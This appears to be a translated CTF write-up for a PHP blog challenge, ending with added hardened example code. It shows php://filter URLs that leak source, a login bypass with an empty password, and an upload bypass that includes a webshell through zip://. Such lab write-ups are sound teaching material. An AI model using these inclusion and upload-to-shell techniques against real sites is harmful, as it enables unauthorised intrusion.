[极客大挑战2020]Roamphp2-Myblog

[screenshot]

Reading the page sources through the php://filter wrapper:

http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=secret
http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=login
http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=home

login.php:

<?php
require_once("secret.php");
mt_srand($secret_seed);
$_SESSION['password'] = mt_rand();
?>
<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){ // No one knows my password, including myself
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>

<?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>

secret.php:

<?php
$secret_seed = mt_rand();
?>


Leaving out the HTML, all the PHP is here: one part handles the file upload, the other the login check.

The login check first:

<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){ // No one knows my password, including myself
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>

The check is just $_POST['password'] == $_SESSION['password'], which is simple: I leave the POSTed password empty and the session password (which is tied to the session id) empty as well, and it goes straight through. One snag is that the form insists on a password being filled in:

Just remove the required attribute from the password field in the frontend.

Log in directly:

[screenshot]

The upload code:

<?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>

The upload only accepts gif, jpeg, jpg and png. The trick I learned here: zip 1.php into 1.zip, rename it to a .jpg and upload it, then extract 1.php through the zip:// wrapper so the one-line webshell gives a shell.

Then read it through the zip:// pseudo-protocol; the format is as follows:

zip:// + path to the zip + %23 + PHP file name (because # in a GET request drops everything after it, it has to be URL-encoded as %23 when used in a GET request)
http://e65d13a1-5f44-40f0-95cc-fe32a9a1c6be.node5.buuoj.cn:81/?page=zip://./assets/img/upload/bad7151866a0d455db50abc8edf6f70978b1b573.jpg%231
No .php suffix is added here because index.php appends it when including. Also note that zip:// is followed by ./ because I did not look up the absolute path.
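Hardened counterparts to the login check and the page/upload handling bypassed above, added here as an example (not code from the challenge or the original post); the function names and the page allowlist are assumptions.

```php
<?php
// Added example, not the challenge's code: hardened counterparts of the
// checks the writeup bypasses. Names and the page allowlist are assumptions.
declare(strict_types=1);

// Must run before anything is written to $_SESSION. The original assigns
// $_SESSION['password'] first; session_start() then replaces $_SESSION with
// the stored data, so the key is null and `'' == null` is true in PHP.
session_start();

// 1. Login: generate the secret after session_start(), from a CSPRNG rather
//    than mt_rand(), and compare strictly and in constant time.
function loginIsValid(array $post, array &$session): bool
{
    if (!isset($session['password'])) {
        $session['password'] = bin2hex(random_bytes(16));
    }
    if (!isset($post['username'], $post['password'])) {
        return false;
    }
    return $post['username'] === 'Longlone'
        && hash_equals($session['password'], (string) $post['password']);
}

// 2. Include: `?page=` goes straight into include(), which is what lets
//    php://filter/... and zip://...%23file work. Map it to a fixed allowlist.
function resolvePage(?string $page): string
{
    $allowed = ['home' => 'home.php', 'login' => 'login.php'];
    return $allowed[$page ?? ''] ?? $allowed['home'];
}

// 3. Upload: the extension and $_FILES[...]['type'] come from the client, so a
//    zip renamed to .jpg passes. Check the bytes instead, and derive the stored
//    extension from the detected type, never from the upload name.
function storedExtensionForImage(string $tmpPath): ?string
{
    $byMime = ['image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset($byMime[$mime]) || getimagesize($tmpPath) === false) {
        return null; // not a real image: reject the upload
    }
    return $byMime[$mime];
}
```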

That is basically it.

[screenshots]

Reference: https://blog.csdn.net/m0_56059226/article/details/119758074